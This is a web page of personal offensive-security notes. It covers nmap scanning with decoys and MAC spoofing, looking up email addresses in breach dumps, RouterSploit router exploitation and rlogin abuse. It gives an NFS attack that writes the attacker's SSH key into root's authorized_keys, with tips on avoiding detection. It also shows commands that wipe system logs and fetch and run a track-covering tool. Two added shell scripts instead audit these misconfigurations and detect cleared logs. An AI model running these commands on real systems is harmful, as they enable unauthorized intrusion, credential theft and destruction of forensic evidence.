badd10de.dev

Hacking


Hacking tools

nmap

Used for network reconnaissance: host discovery, port scanning, OS detection, service/version detection and vulnerability scanning.

# TCP connect scan of a domain, IP or range (no root needed)
nmap -sT domain.name.com.or.ip

# SYN ("half-open") scan, less noisy than a full connect scan; needs root
sudo nmap -sS domain.name.com.or.ip

# Aggressive scan: OS detection, version detection, default scripts and traceroute
sudo nmap -A domain.name.com.or.ip

# Try to identify the OS of the target machines
sudo nmap -O domain.name.com.or.ip

# Try to get the version of the services listening on the open ports
sudo nmap -sV domain.name.com.or.ip

# Run the vulners NSE script (it needs version detection) on all machines of the network
sudo nmap -sV -p21-8080 --script vulners 192.168.1.1/24

# Use decoy IP addresses and a spoofed MAC address to be extra stealthy (sometimes
# MAC spoofing or too many decoys will make the results unreliable).
sudo nmap -O domain.name.com.or.ip -D RND:5 --spoof-mac 01:02:03:04:05:06

# SYN scan plus UDP scan, skipping host discovery (-Pn) so hosts that drop ping are still scanned.
sudo nmap -sS -sU -Pn 192.168.1.1

Sherlock

Can be used to find the social network accounts registered under a given username.

python3 sherlock username

h8mail

This tool can be used to search password breach databases for leaked passwords belonging to one or more given email addresses.

# Query a single target
h8mail -t target@example.com

# Query a single target with a local breach dump
h8mail -t user@email.com -lb '/path/to/breach/compilation/directory'

# Query a list of targets without API calls against the Breach Compilation.
h8mail -t targets.txt -bc /path/to/breach/compilation/directory -sk

Shodan

Shodan is a search engine for internet-connected devices, many of them vulnerable. Using it we can potentially find webcams, satellite telephones, etc. In some cases they are unsecured or use a simple default user/password combination.

Raccoon Scanner

A high performance offensive security tool for reconnaissance and vulnerability scanning. Similar to nmap, but it offers a more exhaustive analysis and extensive reporting capabilities.

raccoon domain.name.com

RouterSploit

Try to find and exploit vulnerabilities in routers and embedded devices with the RouterSploit framework.

# Start the framework
python3 rsf.py

# Try autopwn
use scanners/autopwn
show options
set target 192.168.1.1
run

If the scan has found vulnerabilities, the exploit can be run with:

use exploits/reported/exploit/path
set target 192.168.1.1
check
run

To find target devices, we can search for open web ports with nmap:

nmap -p 80,8080,8081,81 192.168.1.0/24

Metasploit

Framework for exploring and exploiting vulnerabilities.

A typical approach would be to:

  1. Perform exploration of a particular remote/local system to find vulnerabilities.
  2. Try to get shell access.
  3. Create a meterpreter session.
  4. Perform privilege escalation or exploit the current user's permissions.
  5. Post exploitation, which might include clearing tracks (changing or shredding /var/log, .bash_history, .zsh_history), installing a keylogger or backdoor, uploading and running viruses, downloading files, taking webcam pictures/videos, etc.

Common vulnerabilities

rhosts misconfiguration

If the .rhosts file is misconfigured with “+ +” and the ports 512 (exec), 513 (login) and 514 (shell) are open, we can just log in using rsh-client without a user/password with:

rlogin -l root ip.or.domain.name

Exposed NFS filesystems

If port 2049 is open, this can mean that NFS is active on the target machine.

# Check the RPC info to identify NFS
rpcinfo -p ip.or.domain.name

# Show what is being exported, hopefully the root share (`/ *`)
showmount -e ip.or.domain.name

# Exploit this by mounting the root filesystem and adding our key to the
# authorized ssh keys for root. Note that for extra protection we could create
# a new ssh key for each attack instead of using the default one, which could
# give us away.
mount -t nfs ip.or.domain.name:/ /mnt
cat ~/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys
umount /mnt
ssh root@ip.or.domain.name
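An added audit script for the two misconfigurations above, the “+ +” entry in .rhosts and the wildcard / no_root_squash NFS export (this is example code, not from the original page). It runs against constructed sample files; on a real host you would point it at /root/.rhosts, ~/.rhosts and /etc/exports. The write to /root/.ssh only succeeds because the share lacks root_squash, which is the setting the script flags.

```shell
#!/bin/sh
# Added audit example (not code from the original page). It checks a .rhosts
# file for the "+ +" trust-everyone entry and an NFS exports file for shares
# offered to any client ("*") or exported with no_root_squash, which is what
# lets a remote root write to /root/.ssh through the mount.

# rhosts_trusts_all FILE : exit 0 and print the line if FILE trusts all hosts.
rhosts_trusts_all() {
    [ -r "$1" ] || return 1
    grep -v '^[[:space:]]*#' "$1" | tr -s ' \t' ' ' | sed 's/^ //; s/ $//' \
        | grep -x -E '[+]( [+])?'
}

# exports_are_risky FILE : exit 0 and print each export line that is offered
# to "*" or carries no_root_squash. Fix: name the client subnet and keep the
# default root_squash (root on the client becomes nobody on the server).
exports_are_risky() {
    [ -r "$1" ] || return 1
    grep -v '^[[:space:]]*#' "$1" \
        | grep -E '^/[^[:space:]]*[[:space:]]+\*|no_root_squash'
}

# Constructed sample files (not from any real host) so the checks run offline.
SAMPLE_DIR="${TMPDIR:-/tmp}/rhosts-nfs-audit.$$"
mkdir -p "$SAMPLE_DIR"
printf '# metasploitable-style trust-everyone entry\n+ +\n' > "$SAMPLE_DIR/bad.rhosts"
printf 'bastion.example.com alice\n' > "$SAMPLE_DIR/ok.rhosts"
printf '/ *(rw,sync,no_root_squash)\n/srv/data 10.0.0.0/24(ro,root_squash)\n' \
    > "$SAMPLE_DIR/bad.exports"
printf '/srv/data 10.0.0.0/24(ro,root_squash)\n' > "$SAMPLE_DIR/ok.exports"

for f in bad ok; do
    if rhosts_trusts_all "$SAMPLE_DIR/$f.rhosts" >/dev/null; then
        echo "$f.rhosts: trusts every host, remove the '+ +' entry"
    else
        echo "$f.rhosts: ok"
    fi
    if exports_are_risky "$SAMPLE_DIR/$f.exports" >/dev/null; then
        echo "$f.exports: wildcard or no_root_squash export found"
    else
        echo "$f.exports: ok"
    fi
done
```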

Backdoors

If we can tamper with some connection-oriented services, we could insert a backdoor that allows us to connect without anyone noticing. For example, in metasploitable2 there is a doctored vsftpd service that opens a backdoor if the username ends with the “:)” sequence, opening a listening shell on port 6200.

Web services

Very often we can find vulnerable web services, be it because of misconfiguration, default admin passwords, or simply because they are susceptible to the common attacks against web apps. We can practice these with metasploitable2 on the Mutillidae web application.

Searching for vulnerabilities

There are different search engines and databases that we can use to try to find active vulnerabilities.

Tools

Searchsploit

On Linux we can use the tool Searchsploit to search the offline copy of Exploit-DB it ships with for known exploits.

searchsploit kernel 2.6 linux | sort -n

It is important to read through the code of the exploits instead of blindly running things you find on the internet.

Post exploitation

Removing log files

Some interesting log files that we want to get rid of, either by removing them (rm -rf filename), truncating them (truncate -s 0 filename), shredding them (shred -zu filename), or simply zeroing them (cat /dev/null > filename):

/var/log/auth.log
/var/log/cron.log
/var/log/maillog
/var/log/httpd

There are some purpose-built tools for this, like covermyass:

URL: https://github.com/sundowndev/go-covermyass

wget "https://github.com/sundowndev/go-covermyass/releases/download/v0.2/go-covermyass_Linux_x86_64.tar.gz"
tar xfv go-covermyass_Linux_x86_64.tar.gz
chmod +x go-covermyass
./go-covermyass
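From the defender's side, the four techniques above (rm, truncate -s 0, shred -zu, cat /dev/null >) all leave a log missing, empty or smaller than it was. The following added example (not code from the original page) records a size baseline for the listed logs and reports which ones have been tampered with since; it assumes GNU or BSD stat(1) and runs on constructed sample logs.

```shell
#!/bin/sh
# Added detection example (not code from the original page): compare each log
# with a size baseline recorded earlier, e.g. from cron, to catch the clearing
# techniques listed above. The real mitigation is shipping logs to a remote
# collector the host cannot edit; this check only spots tampering on the host.

file_size() {
    stat -c %s "$1" 2>/dev/null || stat -f %z "$1"   # GNU stat first, then BSD
}

# record_baseline BASELINE FILE... : write "size path" for every existing log.
record_baseline() {
    lb="$1"; shift
    : > "$lb"
    for p in "$@"; do
        if [ -f "$p" ]; then printf '%s %s\n' "$(file_size "$p")" "$p" >> "$lb"; fi
    done
}

# log_status BASELINE FILE : print missing, empty, shrunk or ok.
# A shrink right after logrotate is normal; correlate with the rotation times.
log_status() {
    lb="$1"; lf="$2"
    [ -e "$lf" ] || { echo missing; return; }
    size=$(file_size "$lf")
    [ "$size" -gt 0 ] || { echo empty; return; }
    old=$(awk -v p="$lf" '$2 == p { print $1 }' "$lb")
    if [ -n "$old" ] && [ "$size" -lt "$old" ]; then echo shrunk; else echo ok; fi
}

# Constructed sample logs (not from any real host) to try the check offline.
D="${TMPDIR:-/tmp}/logcheck.$$"; mkdir -p "$D"
printf 'Jan  1 10:00:00 host sshd[1]: Accepted publickey for root\n' > "$D/auth.log"
printf 'Jan  1 10:00:00 host CRON[2]: session opened for root\n' > "$D/cron.log"
printf 'line1\nline2\nline3\n' > "$D/maillog"
printf 'GET /index.html 200\n' > "$D/access.log"
record_baseline "$D/baseline" "$D/auth.log" "$D/cron.log" "$D/maillog" "$D/access.log"
: > "$D/auth.log"                 # zeroed, as cat /dev/null > file would do
rm -f "$D/cron.log"               # removed, as rm -rf would do
printf 'line1\n' > "$D/maillog"   # lines edited out
# access.log is left untouched

for f in auth.log cron.log maillog access.log; do
    printf '%s: %s\n' "$f" "$(log_status "$D/baseline" "$D/$f")"
done
```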

Privilege escalation

Linux

If you manage to get a shell on the target machine, there are several things you can do to try to get root. First of all, do some local research:

You can gather more intel about running services and software versions to try to map the attack surface.

At this stage you can use searchsploit to try to find vulnerabilities in the kernel, privileged services or anything else that caught your attention.

Because simple solutions are always better, try to get more info from:

Sometimes complicated things can pay off too!

Windows

Resources